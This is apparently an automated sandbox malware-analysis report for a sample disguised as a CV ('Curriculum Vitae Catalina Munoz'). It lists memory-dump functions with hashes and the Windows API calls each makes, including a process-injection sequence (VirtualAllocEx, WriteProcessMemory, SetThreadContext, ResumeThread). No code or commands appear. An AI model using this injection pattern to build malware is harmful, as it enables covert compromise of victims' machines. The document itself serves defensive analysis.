                                    • Source File: 00000000.00000002.1209871523.0000000007890000.00000040.00000800.00020000.00000000.sdmp, Offset: 07890000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7890000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID: CreateProcess
                                    • String ID:
                                    • API String ID: 963392458-0
                                    • Opcode ID: 063ff05630e91735cb7c893ddb3690620ff0bf95b4fe102053be64b9d0760336
                                    • Instruction ID: 9f83bcb34bf3f9a2aa0aae563f87dcd0d53cfd96cf4f3cf77d2e153d2d2826bc
                                    • Opcode Fuzzy Hash: 063ff05630e91735cb7c893ddb3690620ff0bf95b4fe102053be64b9d0760336
                                    • Instruction Fuzzy Hash: 2F913BB1D0131ADFEF24DF69C84179DBBB2BB48310F188169E849E7240DB759985CF91
                                    Function 02CDD81A Relevance: 1.7, APIs: 1, Instructions: 201COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 02CDDA7E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1203902701.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_2cd0000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID: HandleModule
                                    • String ID:
                                    • API String ID: 4139908857-0
                                    • Opcode ID: 31e9c3a28acc2f92ebd9dd3f16cdf8b23160b702f53e7449c33a9686e1648a7b
                                    • Instruction ID: 684b56a850c7ce3d74abf94c7b40ccead2a900926cbea4ce3b287f9d7369dcf8
                                    • Opcode Fuzzy Hash: 31e9c3a28acc2f92ebd9dd3f16cdf8b23160b702f53e7449c33a9686e1648a7b
                                    • Instruction Fuzzy Hash: 81816371A00B058FDB24DF29D45575ABBF2BF88204F008A2ED58ADBA50DB35E909CF90
                                    Function 05E41D80 Relevance: 1.6, APIs: 1, Instructions: 136COMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05E444E2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1207544579.0000000005E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_5e40000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID: CreateWindow
                                    • String ID:
                                    • API String ID: 716092398-0
                                    • Opcode ID: 34f694cb9412847b0549c303c5bdb6cf411f0c9262f2005027e04feb26109b85
                                    • Instruction ID: 88f3f70473c08b3038ee9cb75f715b936e64313d1314254ed240512ffff6e9ad
                                    • Opcode Fuzzy Hash: 34f694cb9412847b0549c303c5bdb6cf411f0c9262f2005027e04feb26109b85
                                    • Instruction Fuzzy Hash: BD512FB1D043489FEF15CFAAD894ADEBFB1BF48300F24816AE848AB251D7749845CF91
                                    Function 05E41E28 Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05E444E2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1207544579.0000000005E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_5e40000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID: CreateWindow
                                    • String ID:
                                    • API String ID: 716092398-0
                                    • Opcode ID: d70094725d1e778d33313603c5c30682e14e67a572b98569758ba13b61143ce7
                                    • Instruction ID: c098091fed1a9db6bf7ec0cc618f27966ad2665a0050ed0d56c81e61731f34c6
                                    • Opcode Fuzzy Hash: d70094725d1e778d33313603c5c30682e14e67a572b98569758ba13b61143ce7
                                    • Instruction Fuzzy Hash: B551BDB1D103499FDF14CF9AD884ADEBBB5BF48310F64812AE819AB250DB75A845CF90
                                    Function 02CD5CF5 Relevance: 1.6, APIs: 1, Instructions: 98COMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateActCtxA.KERNEL32(?), ref: 02CD5DB1
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1203902701.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_2cd0000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID: Create
                                    • String ID:
                                    • API String ID: 2289755597-0
                                    • Opcode ID: 61af2974b02213b747841f91ef9e684ab2e59376f9bfe20848001c74fc015a80
                                    • Instruction ID: 46074e2aa7fff868eb968a2cbbb7e10671c11e392f093deffc46cee9d05bd24c
                                    • Opcode Fuzzy Hash: 61af2974b02213b747841f91ef9e684ab2e59376f9bfe20848001c74fc015a80
                                    • Instruction Fuzzy Hash: 2041F3B1C00719CBEB24DFA9C9847DDBBB2BF48304F60806AD508AB251DB756946CF90
                                    Function 05E41F7C Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                    Download Yara Rule
                                    APIs
                                    • CallWindowProcW.USER32(?,?,?,?,?), ref: 05E46BD1
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1207544579.0000000005E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_5e40000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID: CallProcWindow
                                    • String ID:
                                    • API String ID: 2714655100-0
                                    • Opcode ID: 88c7c4e08d7e44509e9fa4ad53e4f944e929cb23ff459af4a85b47f65271379f
                                    • Instruction ID: 90999e1a05ee70e60406ee8870ac6d8e9a3dab17f293572bda5c4f673deb2e78
                                    • Opcode Fuzzy Hash: 88c7c4e08d7e44509e9fa4ad53e4f944e929cb23ff459af4a85b47f65271379f
                                    • Instruction Fuzzy Hash: DE4147B4A103098FDB14CF89D488BAABBF6FF89314F24C459D559AB321D774A841CFA0
                                    Function 02CD4538 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateActCtxA.KERNEL32(?), ref: 02CD5DB1
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1203902701.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_2cd0000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID: Create
                                    • String ID:
                                    • API String ID: 2289755597-0
                                    • Opcode ID: 4595ce80c0eec08f097424025f48fad0bf8dcc2337c543bc2b54233d7a9196a1
                                    • Instruction ID: fc988a0a3bb58def12f8778438b5731a29310755c806f286f90e1801e1fdd64c
                                    • Opcode Fuzzy Hash: 4595ce80c0eec08f097424025f48fad0bf8dcc2337c543bc2b54233d7a9196a1
                                    • Instruction Fuzzy Hash: A8410271C0072DCBEB24DFAAC884B9DBBF5BF49344F60806AD508AB251DB756946CF90
                                    Function 0751F890 Relevance: 1.6, APIs: 1, Instructions: 75injectionCOMMON
                                    Download Yara Rule
                                    APIs
                                    • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0751F928
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1208201736.0000000007510000.00000040.00000800.00020000.00000000.sdmp, Offset: 07510000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7510000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID: MemoryProcessWrite
                                    • String ID:
                                    • API String ID: 3559483778-0
                                    • Opcode ID: 512992f6a9cb8be36f6c861a24980b2a1468e42f7e87a3f1fced47af6c0ad9c6
                                    • Instruction ID: 7947a76d7e13a5824674a583addd0666c516bd612f8fd9eaecb0b904ce59bf50
                                    • Opcode Fuzzy Hash: 512992f6a9cb8be36f6c861a24980b2a1468e42f7e87a3f1fced47af6c0ad9c6
                                    • Instruction Fuzzy Hash: 52215AB6D003499FDB10DFAAD881BDEBBF5FF48310F50852AE958A7240D7789941CBA4
                                    Function 07892388 Relevance: 1.6, APIs: 1, Instructions: 75windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • PostMessageW.USER32(?,?,?,?), ref: 07892355
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1209871523.0000000007890000.00000040.00000800.00020000.00000000.sdmp, Offset: 07890000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7890000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID: MessagePost
                                    • String ID:
                                    • API String ID: 410705778-0
                                    • Opcode ID: 5a4ff4cda1cafa5ced197bef1213a886dc37d5f8f386639620425b8608548e5e
                                    • Instruction ID: 2104d79d2a3ad868b4e88f741efe54fab8cf15529e738a325c9b6163bcf01a90
                                    • Opcode Fuzzy Hash: 5a4ff4cda1cafa5ced197bef1213a886dc37d5f8f386639620425b8608548e5e
                                    • Instruction Fuzzy Hash: 273174B2D0021A9FDF20DF98D885BEEBBF0BF08300F188469D815B7650C774A944CBA1
                                    Function 0751F6F8 Relevance: 1.6, APIs: 1, Instructions: 74threadCOMMON
                                    Download Yara Rule
                                    APIs
                                    • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0751F77E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1208201736.0000000007510000.00000040.00000800.00020000.00000000.sdmp, Offset: 07510000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7510000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID: ContextThreadWow64
                                    • String ID:
                                    • API String ID: 983334009-0
                                    • Opcode ID: 1ee174d897592277cbcd75c96abebc4db18e98a9391993cb669adc2364c7816f
                                    • Instruction ID: edffcf6dba5322a7124acd8923f8c48883dc82d5cb2062bda8c4f20d9e7f413c
                                    • Opcode Fuzzy Hash: 1ee174d897592277cbcd75c96abebc4db18e98a9391993cb669adc2364c7816f
                                    • Instruction Fuzzy Hash: 5D2159B5D003498FEB10DFAAC4857EEBBF4FB48320F54842EE459A7281CB789545CB91
                                    Function 05F87601 Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                                    Download Yara Rule
                                    APIs
                                    • DrawTextExW.USER32(?,?,?,?,?,?), ref: 05F8769F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1207721619.0000000005F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F80000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_5f80000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID: DrawText
                                    • String ID:
                                    • API String ID: 2175133113-0
                                    • Opcode ID: f1e8c4ff84338e73159f18727cb382f372957e1b1a33fd8adbee01e79140d2d5
                                    • Instruction ID: 56e06d6a208b7abb801ecccbbce98077c2d4dabc8c69453d00e1b2cdac403dfc
                                    • Opcode Fuzzy Hash: f1e8c4ff84338e73159f18727cb382f372957e1b1a33fd8adbee01e79140d2d5
                                    • Instruction Fuzzy Hash: ED31E5B5D013099FDB10DF9AD884AEEFBF5FB48310F24842AE819A7210D775A550CFA4
                                    Function 0751F898 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                    Download Yara Rule
                                    APIs
                                    • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0751F928
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1208201736.0000000007510000.00000040.00000800.00020000.00000000.sdmp, Offset: 07510000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7510000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID: MemoryProcessWrite
                                    • String ID:
                                    • API String ID: 3559483778-0
                                    • Opcode ID: 5328cfe7c85fe008159c83a31ec4673ea0cbb00029e04155d2ed9fa4bebb2cf0
                                    • Instruction ID: 0e5471c42c624aeb6969b5afb29d730c988c3cf2eac50f547f230cce41a11df6
                                    • Opcode Fuzzy Hash: 5328cfe7c85fe008159c83a31ec4673ea0cbb00029e04155d2ed9fa4bebb2cf0
                                    • Instruction Fuzzy Hash: DF2155B5D003099FDB10DFAAC881BDEBBF5FF48310F50842AE918A7280C7789941CBA4
                                    Function 05F87608 Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                    Download Yara Rule
                                    APIs
                                    • DrawTextExW.USER32(?,?,?,?,?,?), ref: 05F8769F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1207721619.0000000005F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F80000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_5f80000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID: DrawText
                                    • String ID:
                                    • API String ID: 2175133113-0
                                    • Opcode ID: fb60d47beca074bfbeb596fd94474d30a518dd53083ff5d3375efb166b0af9d8
                                    • Instruction ID: 71ce4a238d647c141e8b06fc713eb139f7b9cbc2b56178f9cfe46ec5fcc75a05
                                    • Opcode Fuzzy Hash: fb60d47beca074bfbeb596fd94474d30a518dd53083ff5d3375efb166b0af9d8
                                    • Instruction Fuzzy Hash: EF21F4B5D013099FDB10DF9AD884AEEFBF5FB48310F24842AE819A7210D775A940CFA4
                                    Function 0751F981 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                    Download Yara Rule
                                    APIs
                                    • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0751FA08
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1208201736.0000000007510000.00000040.00000800.00020000.00000000.sdmp, Offset: 07510000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7510000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID: MemoryProcessRead
                                    • String ID:
                                    • API String ID: 1726664587-0
                                    • Opcode ID: 0186e29af582424306a91bf46f953a60d65ed6889ee850ca72348a0dccc65137
                                    • Instruction ID: 545960fd646c74b4f273dc1656715a8ddc43eda33c43a28539cd06bef274b701
                                    • Opcode Fuzzy Hash: 0186e29af582424306a91bf46f953a60d65ed6889ee850ca72348a0dccc65137
                                    • Instruction Fuzzy Hash: 952127B1C003499FDB10DFAAC881BDEBBF1FF48310F50842AE958A7250CB399541CBA4
                                    Function 0751F700 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                    Download Yara Rule
                                    APIs
                                    • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0751F77E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1208201736.0000000007510000.00000040.00000800.00020000.00000000.sdmp, Offset: 07510000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7510000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID: ContextThreadWow64
                                    • String ID:
                                    • API String ID: 983334009-0
                                    • Opcode ID: 486b09d8c21448a18368279de5c4d28cbf687e617b9389ef8cd22db755512d44
                                    • Instruction ID: 5590a3b2d2574587fff3703367a60579b46b7fc4a8892f56cc04bbc634c02dd8
                                    • Opcode Fuzzy Hash: 486b09d8c21448a18368279de5c4d28cbf687e617b9389ef8cd22db755512d44
                                    • Instruction Fuzzy Hash: B52137B5D003098FDB10DFAAC485BEEBBF4BB48320F54842AD459A7280CB789945CFA4
                                    Function 0751F988 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                    Download Yara Rule
                                    APIs
                                    • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0751FA08
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1208201736.0000000007510000.00000040.00000800.00020000.00000000.sdmp, Offset: 07510000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7510000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID: MemoryProcessRead
                                    • String ID:
                                    • API String ID: 1726664587-0
                                    • Opcode ID: 50a5e73ce20b98c2a8da1205de07977c8ad86207ef47eab6f71fe19256418a30
                                    • Instruction ID: 41a5d0e431f5dbb1aeb072a8d3a60d4eedd8da3c6f8c1772af57065cee744b8c
                                    • Opcode Fuzzy Hash: 50a5e73ce20b98c2a8da1205de07977c8ad86207ef47eab6f71fe19256418a30
                                    • Instruction Fuzzy Hash: 732128B1C003499FDB10DFAAC881BDEBBF5FF48310F50842AE918A7240CB399901CBA4
                                    Function 05E40280 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                    Download Yara Rule
                                    APIs
                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 05E4030F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1207544579.0000000005E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_5e40000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID: DuplicateHandle
                                    • String ID:
                                    • API String ID: 3793708945-0
                                    • Opcode ID: 58856ec33a35ea489f674b439bfafd053ad2f2637aa4b22da2794874ae3f5cd0
                                    • Instruction ID: 4cd5a4182ac0bd2a3c5b24b617b2b6cd8a37df2ae48eb3939d31c8f57607b9e9
                                    • Opcode Fuzzy Hash: 58856ec33a35ea489f674b439bfafd053ad2f2637aa4b22da2794874ae3f5cd0
                                    • Instruction Fuzzy Hash: D221E3B5D003089FDB10CFAAD985ADEBBF4FB48310F14842AE958A7250D378A941CF64
                                    Function 05E40288 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                    Download Yara Rule
                                    APIs
                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 05E4030F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1207544579.0000000005E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_5e40000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID: DuplicateHandle
                                    • String ID:
                                    • API String ID: 3793708945-0
                                    • Opcode ID: 03b41e33b6427e03c5e57dbb6ab65245962b0e5deeaef67aad5b02d61ce5a253
                                    • Instruction ID: f75900db9582166d2e79d3506ffb3be8a3c1f8ac2ba7394761c7117973eb8b8b
                                    • Opcode Fuzzy Hash: 03b41e33b6427e03c5e57dbb6ab65245962b0e5deeaef67aad5b02d61ce5a253
                                    • Instruction Fuzzy Hash: 9421E4B5D002089FDB10CF9AD884ADEBFF4FB48310F14801AE954A7350D374A940CFA5
                                    Function 0751F7D0 Relevance: 1.6, APIs: 1, Instructions: 58memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0751F846
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1208201736.0000000007510000.00000040.00000800.00020000.00000000.sdmp, Offset: 07510000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7510000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID: AllocVirtual
                                    • String ID:
                                    • API String ID: 4275171209-0
                                    • Opcode ID: d966e8b1c4814e573917695093fd4d12db9ed4aef501eb8685fe1feb2b74fc2f
                                    • Instruction ID: 6a5feda99f766518f1a974bdc51b627a6e474af1fd3b23f75de6a7c1025c776f
                                    • Opcode Fuzzy Hash: d966e8b1c4814e573917695093fd4d12db9ed4aef501eb8685fe1feb2b74fc2f
                                    • Instruction Fuzzy Hash: 40113875C003499FDB20DFAAD845BDEBFF5EB48320F10841AE515A7650CB359541CBA4
                                    Function 02CDCBE0 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02CDDAF9,00000800,00000000,00000000), ref: 02CDDCEA
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1203902701.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_2cd0000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID: LibraryLoad
                                    • String ID:
                                    • API String ID: 1029625771-0
                                    • Opcode ID: 3a1f606878d5e97b7d979638f27cff2d1cfdb55f1b8ca85914c9dcc47c32d149
                                    • Instruction ID: 2bec4b8421cc84157252999ca705e69f44ad591ab84324b396e3651900228d98
                                    • Opcode Fuzzy Hash: 3a1f606878d5e97b7d979638f27cff2d1cfdb55f1b8ca85914c9dcc47c32d149
                                    • Instruction Fuzzy Hash: 901103B6D003099FDB20CF9AD844B9EFBF4EB89310F50842AE919A7240C7B5A545CFA5
                                    Function 02CDDC7A Relevance: 1.6, APIs: 1, Instructions: 53libraryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02CDDAF9,00000800,00000000,00000000), ref: 02CDDCEA
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1203902701.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_2cd0000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID: LibraryLoad
                                    • String ID:
                                    • API String ID: 1029625771-0
                                    • Opcode ID: 07b451c18b524a4c626158a308abf6aa950d9e26cd08e9fb82fa6a1a6761f43c
                                    • Instruction ID: 3cad53e174065b8fe287cf9f817953487612c29a549f80152d81b91be35b8a04
                                    • Opcode Fuzzy Hash: 07b451c18b524a4c626158a308abf6aa950d9e26cd08e9fb82fa6a1a6761f43c
                                    • Instruction Fuzzy Hash: 101103B6C003098FDB20CF9AD944BDEBBF4EB88310F10842AD919A7200C375A545CFA4
                                    Function 0751F7D8 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0751F846
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1208201736.0000000007510000.00000040.00000800.00020000.00000000.sdmp, Offset: 07510000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7510000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID: AllocVirtual
                                    • String ID:
                                    • API String ID: 4275171209-0
                                    • Opcode ID: 67127b69c4550437a8add5ee2307c7dad351443e6167595c9709129b5a09a638
                                    • Instruction ID: ebc288faa45e66125c1ee5769e21fa9f289ba943ddf238f29f0f726bbdaa8f9b
                                    • Opcode Fuzzy Hash: 67127b69c4550437a8add5ee2307c7dad351443e6167595c9709129b5a09a638
                                    • Instruction Fuzzy Hash: AE112675C003499FDB20DFAAC845BDEBFF5EB48320F148419E915A7650CB759940CFA4
                                    Function 0751F649 Relevance: 1.6, APIs: 1, Instructions: 52threadCOMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1208201736.0000000007510000.00000040.00000800.00020000.00000000.sdmp, Offset: 07510000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7510000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID: ResumeThread
                                    • String ID:
                                    • API String ID: 947044025-0
                                    • Opcode ID: a8af39585dbab4bed6655ecb16bb0a3b764031dc332f1374355c2b19439fcbce
                                    • Instruction ID: 333a27d5f590dd11f122862d2c6a65d86da52c85d5217be095e1fffce11a5e32
                                    • Opcode Fuzzy Hash: a8af39585dbab4bed6655ecb16bb0a3b764031dc332f1374355c2b19439fcbce
                                    • Instruction Fuzzy Hash: C61176B1D003488FDB20DFAAC8457DEFBF4EB48324F24841AD419A7280CB35A941CBA4
                                    Function 078922F0 Relevance: 1.6, APIs: 1, Instructions: 50windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • PostMessageW.USER32(?,?,?,?), ref: 07892355
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1209871523.0000000007890000.00000040.00000800.00020000.00000000.sdmp, Offset: 07890000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7890000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID: MessagePost
                                    • String ID:
                                    • API String ID: 410705778-0
                                    • Opcode ID: 1ce6e8dd91b49c4d78828baef885d7090f5ade7e1ac322eab9faca9b65e6b90b
                                    • Instruction ID: 25e86ac3716e9fd1ad8dfca857820c4c982a110075bebd8da4e18c292640895e
                                    • Opcode Fuzzy Hash: 1ce6e8dd91b49c4d78828baef885d7090f5ade7e1ac322eab9faca9b65e6b90b
                                    • Instruction Fuzzy Hash: F41113B58007499FDB10DF9AD845BDEFBF8FB48320F20841AE518A3210C375A984CFA5
                                    Function 0751F650 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1208201736.0000000007510000.00000040.00000800.00020000.00000000.sdmp, Offset: 07510000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7510000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID: ResumeThread
                                    • String ID:
                                    • API String ID: 947044025-0
                                    • Opcode ID: 1202946f837d9a10ddadc838476b1379a218af8bd4e74296a048dd324563fdb3
                                    • Instruction ID: 85fa42120fa24957bcbef5ad06cca189d08ad5326d0cdc7342abc09506cf4201
                                    • Opcode Fuzzy Hash: 1202946f837d9a10ddadc838476b1379a218af8bd4e74296a048dd324563fdb3
                                    • Instruction Fuzzy Hash: F0116AB1D003498FDB20DFAAC4457DEFBF4EB48320F20841AD419A7280CB356900CF94
                                    Function 02CDDA18 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 02CDDA7E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1203902701.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_2cd0000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID: HandleModule
                                    • String ID:
                                    • API String ID: 4139908857-0
                                    • Opcode ID: e580871748f4bf94da6fbbe0717a6ffb7b293a4f64edbc5e874a110188a8010d
                                    • Instruction ID: f2a36804ce06459dd0f056b9fc4aacb14f740e1353509fba6c29a569dd697576
                                    • Opcode Fuzzy Hash: e580871748f4bf94da6fbbe0717a6ffb7b293a4f64edbc5e874a110188a8010d
                                    • Instruction Fuzzy Hash: F511D2B6C007498FDB10DF9AD444A9EFBF4EB88214F10841AD919A7250C379A545CFA5
                                    Function 078922F8 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • PostMessageW.USER32(?,?,?,?), ref: 07892355
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1209871523.0000000007890000.00000040.00000800.00020000.00000000.sdmp, Offset: 07890000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7890000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID: MessagePost
                                    • String ID:
                                    • API String ID: 410705778-0
                                    • Opcode ID: f3ffeb23c74a2faff3faa7eb78eae7f5efb7c4db91435cef60dfb06d7a32eafa
                                    • Instruction ID: 6091ea1f948723a4498755c48864d9be6ad7c07ca956c25fa3eb68ef8487097b
                                    • Opcode Fuzzy Hash: f3ffeb23c74a2faff3faa7eb78eae7f5efb7c4db91435cef60dfb06d7a32eafa
                                    • Instruction Fuzzy Hash: 2F11D3B58007499FDB10DF9AD845BDEFBF8FB48320F148419E558A7250C375A944CFA5
                                    Function 02B5D1B4 Relevance: .1, Instructions: 72COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1203463906.0000000002B5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B5D000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_2b5d000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: fad56ee549cc24f4da77d87253d42fcc970054411aab7aa168eb83b0088a511c
                                    • Instruction ID: 1864b0d572842d39fb1c2a70838f1b04b0f2488ea1d969d140d9105bdd532407
                                    • Opcode Fuzzy Hash: fad56ee549cc24f4da77d87253d42fcc970054411aab7aa168eb83b0088a511c
                                    • Instruction Fuzzy Hash: 1D21F2716043019FDB05DF10D9C0B26BB65FB88314F20C6ADEC894F252C737D846CA61
                                    Function 02B5D36C Relevance: .1, Instructions: 72COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1203463906.0000000002B5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B5D000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_2b5d000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
